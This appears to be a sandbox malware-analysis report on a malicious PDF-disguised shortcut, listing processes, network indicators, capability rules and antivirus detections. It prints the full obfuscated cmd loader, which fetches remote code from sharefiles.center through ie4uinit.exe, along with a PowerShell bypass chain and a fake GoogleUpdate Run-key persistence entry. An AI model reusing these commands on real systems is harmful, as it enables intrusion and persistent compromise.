Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 21, 2024, 2:24 p.m. | Aug. 21, 2024, 2:26 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MLAvHukP" C:\Users\test22\AppData\Local\Temp\file.pdf.lnk
3016-
cmd.exe "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!""
1784-
WMIC.exe wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings"
2320
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236 -
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC
1720-
cmd.exe "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
2688-
wscript.exe wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
2984-
cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
1780-
powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
2352
-
-
-
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f
1968-
cmd.exe "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
2792-
reg.exe reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
3032
-
-
-
ie4uinit.exe C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -ClearIconCache
2544
-
Name | Response | Post-Analysis Lookup |
---|---|---|
sharefiles.center | 104.21.92.14 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49170 -> 172.67.184.129:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49170 172.67.184.129:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=sharefiles.center | e2:b2:31:0e:2e:bc:db:7e:f3:a3:be:d5:95:0a:42:25:d4:79:01:4e |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | c:\program files (x86)\Google\Chrome\application\chrome.exe |
file | c:\program files\mozilla firefox\firefox.exe |
request | GET https://sharefiles.center/TEST22-PC |
file | C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 |
file | C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings" |
cmdline | powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC |
cmdline | cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!"" |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings" |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!"" |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate | reg_value | wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
VIPRE | Heur.BZC.YAX.Pantera.9.F038540C |
Arcabit | Heur.BZC.YAX.Pantera.9.F038540C |
ESET-NOD32 | LNK/Agent.XL |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Pantera.9.F038540C |
MicroWorld-eScan | Heur.BZC.YAX.Pantera.9.F038540C |
Emsisoft | Heur.BZC.YAX.Pantera.9.F038540C (B) |
DrWeb | Trojan.MulDrop28.7944 |
FireEye | Heur.BZC.YAX.Pantera.9.F038540C |
Sophos | Troj/LnkObf-H |
Detected | |
MAX | malware (ai score=87) |
Kingsoft | Win32.Troj.Unknown.a |
Microsoft | Trojan:Win32/Pantera.A!MTB |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Heur.BZC.YAX.Pantera.9.F038540C |
VBA32 | Trojan.Link.ShellCmd |
Tencent | Win32.Trojan.Agent.Hdhl |
cmd | "c:\windows\system32\cmd.exe" /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcreg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /fwscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pccmd /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /f"c:\windows\system32\cmd.exe" /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /fwmic process call create "c:\users\test22\appdata\local\temp\ie4uinit.exe -basesettings"powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcc:\users\test22\appdata\local\temp\file.pdf.lnk"c:\windows\system32\cmd.exe" /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pccmd /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /f"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pccmd /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcc:\users\test22\appdata\local\temp\ie4uinit.exe -cleariconcache"c:\windows\system32\cmd.exe" /v /c "set "u1=teslacar"&&call set "p2=!u1:~2,1!!u1:~1,1!!u1:~0,1!"&&call !p2! "h3=!u1:~5,1!!u1:~4,1!!u1:~3,1!!u1:~3,1!"&&!h3! !p2! "e4=["&&!h3! !p2! "n5=v"&&!h3! !p2! "d6=e"&&!h3! !p2! "h7=i"&&!h3! !p2! "r8=]"&&!h3! !p2! "i9=g"&&!h3! !p2! "y10=n"&&!h3! !p2! "h11=t"&&!h3! !p2! "f12=u"&&!h3! !p2! "f13=="&&!h3! !p2! "a14=o"&&!h3! !p2! "d15=w"&&!h3! !p2! "n16=s"&&!h3! !p2! "p17=d"&&!h3! !p2! "u18=a"&&!h3! !p2! "l19=e"&&!h3! !p2! "k20=0"&&!h3! !p2! "q21=f"&&!h3! !p2! "x22=a"&&!h3! !p2! "h23=l"&&!h3! !p2! "s24=."&&!h3! !p2! "u25=r"&&!h3! !p2! "o26=r"&&!h3! !p2! "y27=o"&&!h3! !p2! "n28=5"&&!h3! !p2! "b29=f"&&!h3! !p2! "d30=7"&&!h3! !p2! "h31=c"&&!h3! !p2! "f32=h"&&!h3! !p2! "r33=p"&&!h3! !p2! "h34=4"&&!h3! !p2! "q35=%"&&!h3! !p2! "v36=m"&&!h3! !p2! "c37=l"&&!h3! !p2! "i38=x"&&!h3! !p2! "a39=s"&&!h3! !p2! "n40=2"&&!h3! !p2! "x41=\"&&!h3! !p2! "x42=-"&@echo off & (for %t in ("!e4!!n5!!d6!rs!h7!on!r8!" "si!i9!!y10!a!h11!!f12!r!d6! !f13! $w!h7!!y10!d!a14!!d15!!n16! !y10!!h11!$" "!e4!d!d6!s!h11!i!y10!a!h11!i!a14!!y10!!p17!irs!r8!" "!u18!45!l19!=!k20!1" "!e4!!p17!e!q21!!x22!u!h23!t!h7!ns!h11!al!h23!!s24!w!h7!!y10!dow!n16!7!r8!" 